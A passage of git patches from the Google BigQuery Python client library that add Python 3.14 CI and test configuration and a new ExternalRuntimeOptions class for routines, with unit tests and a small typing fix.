a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:3b3a31be60853477bc39ed8d9bac162cac3ba083724cecaad54eb81d4e4dae9c -# created: 2025-04-16T22:40:03.123475241Z + digest: sha256:543e209e7c1c1ffe720eb4db1a3f045a75099304fb19aa11a47dc717b8aae2a9 +# created: 2025-10-09T14:48:42.914384887Z diff --git a/.kokoro/samples/python3.14/common.cfg b/.kokoro/samples/python3.14/common.cfg new file mode 100644 index 000000000..d2fcee553 --- /dev/null +++ b/.kokoro/samples/python3.14/common.cfg @@ -0,0 +1,40 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +# Build logs will be here +action { + define_artifacts { + regex: "**/*sponge_log.xml" + } +} + +# Specify which tests to run +env_vars: { + key: "RUN_TESTS_SESSION" + value: "py-3.14" +} + +# Declare build specific Cloud project. +env_vars: { + key: "BUILD_SPECIFIC_GCLOUD_PROJECT" + value: "python-docs-samples-tests-314" +} + +env_vars: { + key: "TRAMPOLINE_BUILD_FILE" + value: "github/python-bigquery/.kokoro/test-samples.sh" +} + +# Configure the docker image for kokoro-trampoline. +env_vars: { + key: "TRAMPOLINE_IMAGE" + value: "gcr.io/cloud-devrel-kokoro-resources/python-samples-testing-docker" +} + +# Download secrets for samples +gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/python-docs-samples" + +# Download trampoline resources. +gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/trampoline" + +# Use the trampoline script to run in docker. +build_file: "python-bigquery/.kokoro/trampoline_v2.sh" diff --git a/.kokoro/samples/python3.14/continuous.cfg b/.kokoro/samples/python3.14/continuous.cfg new file mode 100644 index 000000000..a1c8d9759 --- /dev/null +++ b/.kokoro/samples/python3.14/continuous.cfg @@ -0,0 +1,6 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "True" +} \ No newline at end of file diff --git a/.kokoro/samples/python3.14/periodic-head.cfg b/.kokoro/samples/python3.14/periodic-head.cfg new file mode 100644 index 000000000..5aa01bab5 --- /dev/null +++ b/.kokoro/samples/python3.14/periodic-head.cfg @@ -0,0 +1,11 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "True" +} + +env_vars: { + key: "TRAMPOLINE_BUILD_FILE" + value: "github/python-bigquery/.kokoro/test-samples-against-head.sh" +} diff --git a/.kokoro/samples/python3.14/periodic.cfg b/.kokoro/samples/python3.14/periodic.cfg new file mode 100644 index 000000000..71cd1e597 --- /dev/null +++ b/.kokoro/samples/python3.14/periodic.cfg @@ -0,0 +1,6 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "False" +} diff --git a/.kokoro/samples/python3.14/presubmit.cfg b/.kokoro/samples/python3.14/presubmit.cfg new file mode 100644 index 000000000..a1c8d9759 --- /dev/null +++ b/.kokoro/samples/python3.14/presubmit.cfg @@ -0,0 +1,6 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "True" +} \ No newline at end of file diff --git a/samples/desktopapp/noxfile.py b/samples/desktopapp/noxfile.py index a86590382..db2333e5a 100644 --- a/samples/desktopapp/noxfile.py +++ b/samples/desktopapp/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13", "3.14"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/geography/noxfile.py b/samples/geography/noxfile.py index a86590382..db2333e5a 100644 --- a/samples/geography/noxfile.py +++ b/samples/geography/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13", "3.14"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/magics/noxfile.py b/samples/magics/noxfile.py index a86590382..db2333e5a 100644 --- a/samples/magics/noxfile.py +++ b/samples/magics/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13", "3.14"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/notebooks/noxfile.py b/samples/notebooks/noxfile.py index a86590382..db2333e5a 100644 --- a/samples/notebooks/noxfile.py +++ b/samples/notebooks/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13", "3.14"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/snippets/noxfile.py b/samples/snippets/noxfile.py index a86590382..db2333e5a 100644 --- a/samples/snippets/noxfile.py +++ b/samples/snippets/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13", "3.14"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] From fa76e310a16ea6cba0071ff1d767ca1c71514da7 Mon Sep 17 00:00:00 2001 From: "google-labs-jules[bot]" <161369871+google-labs-jules[bot]@users.noreply.github.com> Date: Wed, 15 Oct 2025 03:31:50 -0700 Subject: [PATCH 182/202] feat: Add ExternalRuntimeOptions to BigQuery routine (#2311) * feat: Add ExternalRuntimeOptions to BigQuery routine This change introduces the `ExternalRuntimeOptions` class to the `google.cloud.bigquery.routine` module, allowing users to configure runtime options for external routines. Key changes: - Created the `ExternalRuntimeOptions` class with setters and getters for `container_memory`, `container_cpu`, `runtime_connection`, `max_batching_rows`, and `runtime_version`. - Updated the `Routine` class to include an `external_runtime_options` property that accepts an `ExternalRuntimeOptions` object. - Added comprehensive unit tests for the new class and its integration with the `Routine` class, including tests for both valid and invalid input values. * Update google/cloud/bigquery/routine/routine.py * feat: Add ExternalRuntimeOptions to BigQuery routine This change introduces the `ExternalRuntimeOptions` class to the `google.cloud.bigquery.routine` module, allowing users to configure runtime options for external routines. Key changes: - Created the `ExternalRuntimeOptions` class with setters and getters for `container_memory`, `container_cpu`, `runtime_connection`, `max_batching_rows`, and `runtime_version`. - Updated the `Routine` class to include an `external_runtime_options` property that accepts an `ExternalRuntimeOptions` object. - Added comprehensive unit tests for the new class and its integration with the `Routine` class, including tests for both valid and invalid input values. * feat: Add ExternalRuntimeOptions to BigQuery routine This change introduces the `ExternalRuntimeOptions` class to the `google.cloud.bigquery.routine` module, allowing users to configure runtime options for external routines. Key changes: - Created the `ExternalRuntimeOptions` class with setters and getters for `container_memory`, `container_cpu`, `runtime_connection`, `max_batching_rows`, and `runtime_version`. - Updated the `Routine` class to include an `external_runtime_options` property that accepts an `ExternalRuntimeOptions` object. - Added comprehensive unit tests for the new class and its integration with the `Routine` class, including tests for both valid and invalid input values. - Added additional tests to improve code coverage based on feedback. * feat: Add ExternalRuntimeOptions to BigQuery routine This change introduces the `ExternalRuntimeOptions` class to the `google.cloud.bigquery.routine` module, allowing users to configure runtime options for external routines. Key changes: - Created the `ExternalRuntimeOptions` class with setters and getters for `container_memory`, `container_cpu`, `runtime_connection`, `max_batching_rows`, and `runtime_version`. - Updated the `Routine` class to include an `external_runtime_options` property that accepts an `ExternalRuntimeOptions` object. - Added comprehensive unit tests for the new class and its integration with the `Routine` class, including tests for both valid and invalid input values. - Added additional tests to improve code coverage based on feedback. - Addressed PyType errors by using helper functions for type conversion. * Update tests/unit/routine/test_external_runtime_options.py * feat: Add ExternalRuntimeOptions to BigQuery routine This change introduces the `ExternalRuntimeOptions` class to the `google.cloud.bigquery.routine` module, allowing users to configure runtime options for external routines. Key changes: - Created the `ExternalRuntimeOptions` class with setters and getters for `container_memory`, `container_cpu`, `runtime_connection`, `max_batching_rows`, and `runtime_version`. - Updated the `Routine` class to include an `external_runtime_options` property that accepts an `ExternalRuntimeOptions` object. - Added comprehensive unit tests for the new class and its integration with the `Routine` class, including tests for both valid and invalid input values. - Added additional tests to improve code coverage based on feedback. - Addressed PyType errors by using helper functions for type conversion. - Addressed formatting nits from code review. --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> Co-authored-by: Chalmer Lowe Co-authored-by: Lingqing Gan --- google/cloud/bigquery/__init__.py | 2 + google/cloud/bigquery/routine/__init__.py | 2 + google/cloud/bigquery/routine/routine.py | 185 ++++++++++++++++- .../routine/test_external_runtime_options.py | 191 ++++++++++++++++++ tests/unit/routine/test_routine.py | 42 ++++ 5 files changed, 421 insertions(+), 1 deletion(-) create mode 100644 tests/unit/routine/test_external_runtime_options.py diff --git a/google/cloud/bigquery/__init__.py b/google/cloud/bigquery/__init__.py index d39c71641..904bea3d4 100644 --- a/google/cloud/bigquery/__init__.py +++ b/google/cloud/bigquery/__init__.py @@ -98,6 +98,7 @@ from google.cloud.bigquery.routine import RoutineReference from google.cloud.bigquery.routine import RoutineType from google.cloud.bigquery.routine import RemoteFunctionOptions +from google.cloud.bigquery.routine import ExternalRuntimeOptions from google.cloud.bigquery.schema import PolicyTagList from google.cloud.bigquery.schema import SchemaField from google.cloud.bigquery.schema import FieldElementType @@ -181,6 +182,7 @@ "RoutineArgument", "RoutineReference", "RemoteFunctionOptions", + "ExternalRuntimeOptions", # Shared helpers "SchemaField", "FieldElementType", diff --git a/google/cloud/bigquery/routine/__init__.py b/google/cloud/bigquery/routine/__init__.py index e576b0d49..025103957 100644 --- a/google/cloud/bigquery/routine/__init__.py +++ b/google/cloud/bigquery/routine/__init__.py @@ -21,6 +21,7 @@ from google.cloud.bigquery.routine.routine import RoutineReference from google.cloud.bigquery.routine.routine import RoutineType from google.cloud.bigquery.routine.routine import RemoteFunctionOptions +from google.cloud.bigquery.routine.routine import ExternalRuntimeOptions __all__ = ( @@ -30,4 +31,5 @@ "RoutineReference", "RoutineType", "RemoteFunctionOptions", + "ExternalRuntimeOptions", ) diff --git a/google/cloud/bigquery/routine/routine.py b/google/cloud/bigquery/routine/routine.py index e933fa137..c5aa8750e 100644 --- a/google/cloud/bigquery/routine/routine.py +++ b/google/cloud/bigquery/routine/routine.py @@ -15,7 +15,7 @@ # limitations under the License. """Define resources for the BigQuery Routines API.""" - +import typing from typing import Any, Dict, Optional, Union import google.cloud._helpers # type: ignore @@ -69,6 +69,7 @@ class Routine(object): "determinism_level": "determinismLevel", "remote_function_options": "remoteFunctionOptions", "data_governance_type": "dataGovernanceType", + "external_runtime_options": "externalRuntimeOptions", } def __init__(self, routine_ref, **kwargs) -> None: @@ -349,6 +350,37 @@ def data_governance_type(self, value): ) self._properties[self._PROPERTY_TO_API_FIELD["data_governance_type"]] = value + @property + def external_runtime_options(self): + """Optional[google.cloud.bigquery.routine.ExternalRuntimeOptions]: + Configures the external runtime options for a routine. + + Raises: + ValueError: + If the value is not + :class:`~google.cloud.bigquery.routine.ExternalRuntimeOptions` or + :data:`None`. + """ + prop = self._properties.get( + self._PROPERTY_TO_API_FIELD["external_runtime_options"] + ) + if prop is not None: + return ExternalRuntimeOptions.from_api_repr(prop) + + @external_runtime_options.setter + def external_runtime_options(self, value): + api_repr = value + if isinstance(value, ExternalRuntimeOptions): + api_repr = value.to_api_repr() + elif value is not None: + raise ValueError( + "value must be google.cloud.bigquery.routine.ExternalRuntimeOptions " + "or None" + ) + self._properties[ + self._PROPERTY_TO_API_FIELD["external_runtime_options"] + ] = api_repr + @classmethod def from_api_repr(cls, resource: dict) -> "Routine": """Factory: construct a routine given its API representation. @@ -736,3 +768,154 @@ def __repr__(self): for property_name in sorted(self._PROPERTY_TO_API_FIELD) ] return "RemoteFunctionOptions({})".format(", ".join(all_properties)) + + +class ExternalRuntimeOptions(object): + """Options for the runtime of the external system. + + Args: + container_memory (str): + Optional. Amount of memory provisioned for a Python UDF container + instance. Format: {number}{unit} where unit is one of "M", "G", "Mi" + and "Gi" (e.g. 1G, 512Mi). If not specified, the default value is + 512Mi. For more information, see `Configure container limits for + Python UDFs `_ + container_cpu (int): + Optional. Amount of CPU provisioned for a Python UDF container + instance. For more information, see `Configure container limits + for Python UDFs `_ + runtime_connection (str): + Optional. Fully qualified name of the connection whose service account + will be used to execute the code in the container. Format: + "projects/{projectId}/locations/{locationId}/connections/{connectionId}" + max_batching_rows (int): + Optional. Maximum number of rows in each batch sent to the external + runtime. If absent or if 0, BigQuery dynamically decides the number of + rows in a batch. + runtime_version (str): + Optional. Language runtime version. Example: python-3.11. + """ + + _PROPERTY_TO_API_FIELD = { + "container_memory": "containerMemory", + "container_cpu": "containerCpu", + "runtime_connection": "runtimeConnection", + "max_batching_rows": "maxBatchingRows", + "runtime_version": "runtimeVersion", + } + + def __init__( + self, + container_memory: Optional[str] = None, + container_cpu: Optional[int] = None, + runtime_connection: Optional[str] = None, + max_batching_rows: Optional[int] = None, + runtime_version: Optional[str] = None, + _properties: Optional[Dict] = None, + ) -> None: + if _properties is None: + _properties = {} + self._properties = _properties + + if container_memory is not None: + self.container_memory = container_memory + if container_cpu is not None: + self.container_cpu = container_cpu + if runtime_connection is not None: + self.runtime_connection = runtime_connection + if max_batching_rows is not None: + self.max_batching_rows = max_batching_rows + if runtime_version is not None: + self.runtime_version = runtime_version + + @property + def container_memory(self) -> Optional[str]: + """Optional. Amount of memory provisioned for a Python UDF container instance.""" + return _helpers._str_or_none(self._properties.get("containerMemory")) + + @container_memory.setter + def container_memory(self, value: Optional[str]): + if value is not None and not isinstance(value, str): + raise ValueError("container_memory must be a string or None.") + self._properties["containerMemory"] = value + + @property + def container_cpu(self) -> Optional[int]: + """Optional. Amount of CPU provisioned for a Python UDF container instance.""" + return _helpers._int_or_none(self._properties.get("containerCpu")) + + @container_cpu.setter + def container_cpu(self, value: Optional[int]): + if value is not None and not isinstance(value, int): + raise ValueError("container_cpu must be an integer or None.") + self._properties["containerCpu"] = value + + @property + def runtime_connection(self) -> Optional[str]: + """Optional. Fully qualified name of the connection.""" + return _helpers._str_or_none(self._properties.get("runtimeConnection")) + + @runtime_connection.setter + def runtime_connection(self, value: Optional[str]): + if value is not None and not isinstance(value, str): + raise ValueError("runtime_connection must be a string or None.") + self._properties["runtimeConnection"] = value + + @property + def max_batching_rows(self) -> Optional[int]: + """Optional. Maximum number of rows in each batch sent to the external runtime.""" + return typing.cast( + int, _helpers._int_or_none(self._properties.get("maxBatchingRows")) + ) + + @max_batching_rows.setter + def max_batching_rows(self, value: Optional[int]): + if value is not None and not isinstance(value, int): + raise ValueError("max_batching_rows must be an integer or None.") + self._properties["maxBatchingRows"] = _helpers._str_or_none(value) + + @property + def runtime_version(self) -> Optional[str]: + """Optional. Language runtime version.""" + return _helpers._str_or_none(self._properties.get("runtimeVersion")) + + @runtime_version.setter + def runtime_version(self, value: Optional[str]): + if value is not None and not isinstance(value, str): + raise ValueError("runtime_version must be a string or None.") + self._properties["runtimeVersion"] = value + + @classmethod + def from_api_repr(cls, resource: dict) -> "ExternalRuntimeOptions": + """Factory: construct external runtime options given its API representation. + Args: + resource (Dict[str, object]): Resource, as returned from the API. + Returns: + google.cloud.bigquery.routine.ExternalRuntimeOptions: + Python object, as parsed from ``resource``. + """ + ref = cls() + ref._properties = resource + return ref + + def to_api_repr(self) -> dict: + """Construct the API resource representation of this ExternalRuntimeOptions. + Returns: + Dict[str, object]: External runtime options represented as an API resource. + """ + return self._properties + + def __eq__(self, other): + if not isinstance(other, ExternalRuntimeOptions): + return NotImplemented + return self._properties == other._properties + + def __ne__(self, other): + return not self == other + + def __repr__(self): + all_properties = [ + "{}={}".format(property_name, repr(getattr(self, property_name))) + for property_name in sorted(self._PROPERTY_TO_API_FIELD) + ] + return "ExternalRuntimeOptions({})".format(", ".join(all_properties)) diff --git a/tests/unit/routine/test_external_runtime_options.py b/tests/unit/routine/test_external_runtime_options.py new file mode 100644 index 000000000..d4edaae9a --- /dev/null +++ b/tests/unit/routine/test_external_runtime_options.py @@ -0,0 +1,191 @@ +# -*- coding: utf-8 -*- +# +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import pytest + + +@pytest.fixture +def target_class(): + from google.cloud.bigquery.routine.routine import ExternalRuntimeOptions + + return ExternalRuntimeOptions + + +@pytest.fixture +def object_under_test(target_class): + return target_class() + + +def test_ctor(target_class): + container_memory = "1G" + container_cpu = 1 + runtime_connection = ( + "projects/my-project/locations/us-central1/connections/my-connection" + ) + max_batching_rows = 100 + runtime_version = "python-3.11" + + instance = target_class( + container_memory=container_memory, + container_cpu=container_cpu, + runtime_connection=runtime_connection, + max_batching_rows=max_batching_rows, + runtime_version=runtime_version, + ) + + assert instance.container_memory == container_memory + assert instance.container_cpu == container_cpu + assert instance.runtime_connection == runtime_connection + assert instance.max_batching_rows == max_batching_rows + assert instance.runtime_version == runtime_version + + +def test_container_memory(object_under_test): + container_memory = "512Mi" + object_under_test.container_memory = container_memory + assert object_under_test.container_memory == container_memory + + +def test_container_cpu(object_under_test): + container_cpu = 1 + object_under_test.container_cpu = container_cpu + assert object_under_test.container_cpu == container_cpu + + +def test_runtime_connection(object_under_test): + runtime_connection = ( + "projects/my-project/locations/us-central1/connections/my-connection" + ) + object_under_test.runtime_connection = runtime_connection + assert object_under_test.runtime_connection == runtime_connection + + +def test_max_batching_rows(object_under_test): + max_batching_rows = 100 + object_under_test.max_batching_rows = max_batching_rows + assert object_under_test.max_batching_rows == max_batching_rows + + +def test_runtime_version(object_under_test): + runtime_version = "python-3.11" + object_under_test.runtime_version = runtime_version + assert object_under_test.runtime_version == runtime_version + + +def test_ctor_w_properties(target_class): + properties = { + "containerMemory": "1G", + "containerCpu": 1, + } + instance = target_class(_properties=properties) + assert instance._properties == properties + + +def test_ne(target_class): + instance1 = target_class(container_memory="1G") + instance2 = target_class(container_memory="2G") + assert instance1 != instance2 + + +def test_ne_false(target_class): + instance1 = target_class(container_memory="1G") + instance2 = target_class(container_memory="1G") + assert not (instance1 != instance2) + + +def test_eq_not_implemented(object_under_test): + assert not (object_under_test == object()) + assert object_under_test != object() + + +def test_from_api_repr(target_class): + resource = { + "containerMemory": "1G", + "containerCpu": 1, + "runtimeConnection": "projects/my-project/locations/us-central1/connections/my-connection", + "maxBatchingRows": "100", + "runtimeVersion": "python-3.11", + } + instance = target_class.from_api_repr(resource) + + assert instance.container_memory == "1G" + assert instance.container_cpu == 1 + assert ( + instance.runtime_connection + == "projects/my-project/locations/us-central1/connections/my-connection" + ) + assert instance.max_batching_rows == 100 + assert instance.runtime_version == "python-3.11" + + +def test_to_api_repr(target_class): + instance = target_class( + container_memory="1G", + container_cpu=1, + runtime_connection="projects/my-project/locations/us-central1/connections/my-connection", + max_batching_rows=100, + runtime_version="python-3.11", + ) + resource = instance.to_api_repr() + + assert resource == { + "containerMemory": "1G", + "containerCpu": 1, + "runtimeConnection": "projects/my-project/locations/us-central1/connections/my-connection", + "maxBatchingRows": "100", + "runtimeVersion": "python-3.11", + } + + +def test_repr(target_class): + instance = target_class( + container_memory="1G", + container_cpu=1, + ) + expected_repr = ( + "ExternalRuntimeOptions(container_cpu=1, container_memory='1G', " + "max_batching_rows=None, runtime_connection=None, runtime_version=None)" + ) + assert repr(instance) == expected_repr + + +def test_invalid_container_memory(object_under_test): + with pytest.raises(ValueError, match="container_memory must be a string or None."): + object_under_test.container_memory = 123 + + +def test_invalid_container_cpu(object_under_test): + with pytest.raises(ValueError, match="container_cpu must be an integer or None."): + object_under_test.container_cpu = "1" + + +def test_invalid_runtime_connection(object_under_test): + with pytest.raises( + ValueError, match="runtime_connection must be a string or None." + ): + object_under_test.runtime_connection = 123 + + +def test_invalid_max_batching_rows(object_under_test): + with pytest.raises( + ValueError, match="max_batching_rows must be an integer or None." + ): + object_under_test.max_batching_rows = "100" + + +def test_invalid_runtime_version(object_under_test): + with pytest.raises(ValueError, match="runtime_version must be a string or None."): + object_under_test.runtime_version = 123 diff --git a/tests/unit/routine/test_routine.py b/tests/unit/routine/test_routine.py index acd3bc40e..965c6b2eb 100644 --- a/tests/unit/routine/test_routine.py +++ b/tests/unit/routine/test_routine.py @@ -81,6 +81,13 @@ def test_ctor_w_properties(target_class): max_batching_rows=99, user_defined_context={"foo": "bar"}, ) + external_runtime_options = bigquery.ExternalRuntimeOptions( + container_memory="1G", + container_cpu=1, + runtime_connection="projects/p/locations/l/connections/c", + max_batching_rows=100, + runtime_version="python-3.11", + ) actual_routine = target_class( routine_id, @@ -92,6 +99,7 @@ def test_ctor_w_properties(target_class): description=description, determinism_level=determinism_level, remote_function_options=options, + external_runtime_options=external_runtime_options, ) ref = RoutineReference.from_string(routine_id) @@ -106,6 +114,7 @@ def test_ctor_w_properties(target_class): actual_routine.determinism_level == bigquery.DeterminismLevel.NOT_DETERMINISTIC ) assert actual_routine.remote_function_options == options + assert actual_routine.external_runtime_options == external_runtime_options def test_ctor_invalid_remote_function_options(target_class): @@ -119,6 +128,17 @@ def test_ctor_invalid_remote_function_options(target_class): ) +def test_ctor_invalid_external_runtime_options(target_class): + with pytest.raises( + ValueError, + match=".*must be google.cloud.bigquery.routine.ExternalRuntimeOptions.*", + ): + target_class( + "my-proj.my_dset.my_routine", + external_runtime_options=object(), + ) + + def test_from_api_repr(target_class): from google.cloud.bigquery.routine import RoutineArgument from google.cloud.bigquery.routine import RoutineReference @@ -155,6 +175,13 @@ def test_from_api_repr(target_class): }, }, "dataGovernanceType": "DATA_MASKING", + "externalRuntimeOptions": { + "containerMemory": "1G", + "containerCpu": 1, + "runtimeConnection": "projects/p/locations/l/connections/c", + "maxBatchingRows": 100, + "runtimeVersion": "python-3.11", + }, } actual_routine = target_class.from_api_repr(resource) @@ -194,6 +221,14 @@ def test_from_api_repr(target_class): assert actual_routine.remote_function_options.max_batching_rows == 50 assert actual_routine.remote_function_options.user_defined_context == {"foo": "bar"} assert actual_routine.data_governance_type == "DATA_MASKING" + assert actual_routine.external_runtime_options.container_memory == "1G" + assert actual_routine.external_runtime_options.container_cpu == 1 + assert ( + actual_routine.external_runtime_options.runtime_connection + == "projects/p/locations/l/connections/c" + ) + assert actual_routine.external_runtime_options.max_batching_rows == 100 + assert actual_routine.external_runtime_options.runtime_version == "python-3.11" def test_from_api_repr_tvf_function(target_class): @@ -297,6 +332,7 @@ def test_from_api_repr_w_minimal_resource(target_class): assert actual_routine.determinism_level is None assert actual_routine.remote_function_options is None assert actual_routine.data_governance_type is None + assert actual_routine.external_runtime_options is None def test_from_api_repr_w_unknown_fields(target_class): @@ -571,6 +607,12 @@ def test_set_remote_function_options_w_none(object_under_test): assert object_under_test._properties["remoteFunctionOptions"] is None +def test_set_external_runtime_options_w_none(object_under_test): + object_under_test.external_runtime_options = None + assert object_under_test.external_runtime_options is None + assert object_under_test._properties["externalRuntimeOptions"] is None + + def test_set_data_governance_type_w_none(object_under_test): object_under_test.data_governance_type = None assert object_under_test.data_governance_type is None From b11e09cb6ee32e451b37eda66bece2220b9ceaba Mon Sep 17 00:00:00 2001 From: Shenyang Cai Date: Wed, 15 Oct 2025 14:30:12 -0700 Subject: [PATCH 183/202] fix: include `io.Base` in the `PathType` (#2323) --- google/cloud/bigquery/client.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index ea592852a..c50e7c2d7 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -139,7 +139,7 @@ if typing.TYPE_CHECKING: # pragma: NO COVER # os.PathLike is only subscriptable in Python 3.9+, thus shielding with a condition. - PathType = Union[str, bytes, os.PathLike[str], os.PathLike[bytes]] + PathType = Union[str, bytes, os.PathLike[str], os.PathLike[bytes], io.IOBase] _DEFAULT_CHUNKSIZE = 100 * 1024 * 1024 # 100 MB _MAX_MULTIPART_SIZE = 5 * 1024 * 1024 _DEFAULT_NUM_RETRIES = 6 From 6065e14c448cb430189982dd70025fa0575777ca Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Mon, 20 Oct 2025 15:06:52 -0400 Subject: [PATCH 184/202] feat: adds support for Python runtime 3.14 (#2322) * feat: adds support for Python runtime 3.14 * adds step to install gdal * adds files required by pyarrow * adds repo required by pyarrow * corrects url to repo required by pyarrow * testing a theory with a conditional * testing a theory with a conditional version of ubuntu * testing a new approach to installing arrow * testing a new approach to dearmoring the key * back to the basics * trying a conditional again. * adds explanatory comment resets ubuntu version to latest * Apply suggestion from @chalmerlowe * Apply suggestion from @chalmerlowe * Apply suggestion from @chalmerlowe * Apply suggestion from @chalmerlowe --- .github/sync-repo-settings.yaml | 1 + .github/workflows/unittest.yml | 11 ++++++++--- CONTRIBUTING.rst | 4 +++- noxfile.py | 2 +- owlbot.py | 2 +- pyproject.toml | 3 +++ testing/constraints-3.14.txt | 2 ++ 7 files changed, 19 insertions(+), 6 deletions(-) create mode 100644 testing/constraints-3.14.txt diff --git a/.github/sync-repo-settings.yaml b/.github/sync-repo-settings.yaml index 1e61b4d65..ac91806eb 100644 --- a/.github/sync-repo-settings.yaml +++ b/.github/sync-repo-settings.yaml @@ -19,6 +19,7 @@ branchProtectionRules: - 'Samples - Python 3.11' - 'Samples - Python 3.12' - 'Samples - Python 3.13' + - 'Samples - Python 3.14' - pattern: v2 requiresLinearHistory: true requiresCodeOwnerReviews: true diff --git a/.github/workflows/unittest.yml b/.github/workflows/unittest.yml index 24c9ddbaf..f6b92547e 100644 --- a/.github/workflows/unittest.yml +++ b/.github/workflows/unittest.yml @@ -5,11 +5,10 @@ on: name: unittest jobs: unit: - # Use `ubuntu-latest` runner. runs-on: ubuntu-latest strategy: matrix: - python: ['3.9', '3.11', '3.12', '3.13'] + python: ['3.9', '3.10', '3.11', '3.12', '3.13', '3.14'] steps: - name: Checkout uses: actions/checkout@v4 @@ -22,6 +21,12 @@ jobs: python -m pip install --upgrade setuptools pip wheel python -m pip install nox - name: Run unit tests + + # TODO (https://b.corp.google.com/issues/450370502) 3.14 is not yet supported by pyarrow. See + # https://github.com/googleapis/google-cloud-python/issues/14686 + # https://github.com/apache/arrow/issues/47438 + # Reinstate running tests with 3.14 once this bug is fixed + if: matrix.python != '3.14' env: COVERAGE_FILE: .coverage-${{ matrix.python }} run: | @@ -38,7 +43,7 @@ jobs: runs-on: ubuntu-latest strategy: matrix: - python: ['3.9', '3.13'] + python: ['3.9', '3.14'] steps: - name: Checkout uses: actions/checkout@v4 diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst index b2993768b..3f8653f4b 100644 --- a/CONTRIBUTING.rst +++ b/CONTRIBUTING.rst @@ -22,7 +22,7 @@ In order to add a feature: documentation. - The feature must work fully on the following CPython versions: - 3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows. + 3.9, 3.10, 3.11, 3.12, 3.13 and 3.14 on both UNIX and Windows. - The feature must not add unnecessary dependencies (where "unnecessary" is of course subjective, but new dependencies should @@ -226,12 +226,14 @@ We support: - `Python 3.11`_ - `Python 3.12`_ - `Python 3.13`_ +- `Python 3.14`_ .. _Python 3.9: https://docs.python.org/3.9/ .. _Python 3.10: https://docs.python.org/3.10/ .. _Python 3.11: https://docs.python.org/3.11/ .. _Python 3.12: https://docs.python.org/3.12/ .. _Python 3.13: https://docs.python.org/3.13/ +.. _Python 3.14: https://docs.python.org/3.14/ Supported versions can be found in our ``noxfile.py`` `config`_. diff --git a/noxfile.py b/noxfile.py index eb79c238d..2457382fb 100644 --- a/noxfile.py +++ b/noxfile.py @@ -39,7 +39,7 @@ DEFAULT_PYTHON_VERSION = "3.9" SYSTEM_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12", "3.13"] -UNIT_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12", "3.13"] +UNIT_TEST_PYTHON_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13", "3.14"] CURRENT_DIRECTORY = pathlib.Path(__file__).parent.absolute() diff --git a/owlbot.py b/owlbot.py index 80cf9d6e3..bd694180f 100644 --- a/owlbot.py +++ b/owlbot.py @@ -56,7 +56,7 @@ "pandas": "https://pandas.pydata.org/pandas-docs/stable/", }, system_test_python_versions=["3.9", "3.13"], - unit_test_python_versions=["3.9", "3.10", "3.11", "3.12", "3.13"], + unit_test_python_versions=["3.9", "3.10", "3.11", "3.12", 